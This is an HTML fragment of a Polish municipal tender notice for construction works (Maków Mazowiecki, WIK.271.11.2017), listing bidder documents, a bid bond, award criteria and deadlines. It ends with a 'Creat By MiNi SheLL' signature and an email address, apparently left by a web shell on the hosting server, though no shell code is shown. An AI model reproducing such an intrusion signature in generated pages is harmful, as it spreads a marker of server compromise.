                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)wykaz robót budowlanych odpowiadających warunkowi określonemu w Rozdziale 9 ust. 2 pkt 1 SIWZ wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości lub ilości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone; przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wzór wykazu stanowi załącznik nr 7 do SIWZ;
2)wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich uprawnień niezbędnych do wykonania zamówienia publicznego oraz informacją o podstawie do dysponowania tymi osobami; wzór wykazu stanowi załącznik nr 8 do SIWZ;
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1)w terminie 3 dni od zamieszczenia przez Zamawiającego informacji z otwarcia ofert na stronie internetowej, na której udostępniana jest SIWZ Wykonawcy składają bez wezwania oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Wzór oświadczenia stanowi załącznik nr 10 do SIWZ.
2)zobowiązanie do oddania do dyspozycji zasobów  jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zdolnościach innych podmiotów (dokument składany wraz z ofertą).</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 30.000,00 zł (słownie złotych: trzydzieści tysięcy).
2.Wykonawca może wnieść wadium w jednej lub w kilku formach przewidzianych w art. 45 ust.    6 ustawy, tj.:
1)pieniądzu,
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)gwarancjach bankowych,
4)gwarancjach ubezpieczeniowych,
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r., o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 z późn. zm.).
3.Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
4.Wadium w pieniądzu należy wnieść przelewem  na konto Zamawiającego:
Bank Spółdzielczy w Krasnosielcu - Nr 94891700010012558520000040 z dopiskiem  Wadium w postępowaniu WIK.271.11.2017
5.W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego.
6.W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert 
w siedzibie Zamawiającego w Sekretariacie Urzędu Miejskiego w Makowie Mazowieckim pok. 19 lub dołączyć do oferty.
7.Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje odrzucenie oferty Wykonawcy na podstawie art. 89 ust. 1 pkt 7b ustawy.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60.00</td></tr><tr><td>udzielona gwarancja</td><td>40.00</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje możliwość wprowadzenia istotnych zmian do umowy w przypadku konieczności zmiany terminu realizacji w związku z:
a)z brakiem możliwości prowadzenia robót na skutek obiektywnych warunków klimatycznych lub,
b)działaniem siły wyższej w rozumieniu przepisów Kodeksu cywilnego.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 02/05/2017, godzina: 09:50,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com